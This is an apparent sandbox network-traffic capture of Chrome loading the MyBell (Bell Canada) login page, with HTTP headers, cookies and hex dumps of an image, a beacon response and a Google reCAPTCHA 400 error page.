                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d9732123-901e-007b-1098-25ac50000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131205Z-16849878b78p49s6zkwt11bbkn000000096g00000000ed43
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      83192.168.2.949856206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC3118OUTGET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=3160494552&en=gticcd0a&end=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC2188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 6
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000f221410871ccc8af493ab391a973280084828ecffad707b3b3ca8ec0f430a45b08a09b80c4113000f2a430e583f32145314b5b9bb701a2f3ce1fa30cad5085f521b8b87063fc0e54826708331e6e900dfac6a17fe0819c18; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC6INData Raw: 46 4c 28 4f 41 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: FL(OA)


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      84192.168.2.949857206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC2811OUTGET /Styles/RSX/mybell/img/img_login_MyBell_June2021.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC2345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Nov 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 07 Jun 2021 19:46:18 GMT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      ETag: "1D75BD5C8752100"
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 12306
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000ebcaddb5808a11d848bc75dbbbe2187121f84c2ed66c2770ddbecf7361ac358f082a5a62a511300007674f4580ecc95812a0bdefe896981147b6205068a9141e9bd3d172223b3ebf055cd6d869c32fef936a588dc452b36e; Path=/
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC12306INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 0a 07 07 07 08 07 0a 08 08 0a 0f 0a 08 0a 0f 12 0d 0a 0a 0d 12 14 10 10 12 10 10 14 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 0b 0c 0c 15 13 15 22 18 18 22 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 67 00 b3 03 01 11 00 02 11 01 03 11 01 ff c4 00 a6 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 00 02 04 05 06 01 07 08 10 00 02 01 03 01 03 06 05 10 06 09 04 01 05 00 00 01 02 03 00 04 11 12 05 21 31 06 13 22 32 41 51 42 52 71 73 91 07 14 15 23 34 35 61 62 72 81 82 92 b2 b3
                                                                                                                                                                                                                                                                                                                                      Data Ascii: JFIF""g!1"2AQBRqs#45abr


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      85192.168.2.949854142.250.185.2284433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC698OUTGET /recaptcha/enterprise.js?render=6LeHfTIaAAAAAE8TkvlCBFUqP7E52VxL6ZQnqjli&onload=onloadCallback HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC767INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC611INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 400 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC1060INData Raw: 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: @media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      86192.168.2.949862206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC3118OUTGET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=2088849961&en=gticcd0a&end=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC2188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 6
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab200073be08422c9d68b2f686857378812b15884ed399374f14a0536e1613a9c53d4f08a9047819113000e366317543c75c6a12a0bdefe896981147b6205068a9141e9bd3d172223b3ebf055cd6d869c32fef936a588dc452b36e; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC6INData Raw: 46 4c 28 4f 41 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: FL(OA)


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      87192.168.2.949864206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC3073OUTGET //Web/MYB/custom/image/echat/assets/Chat-Button-Bubbles(D).png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
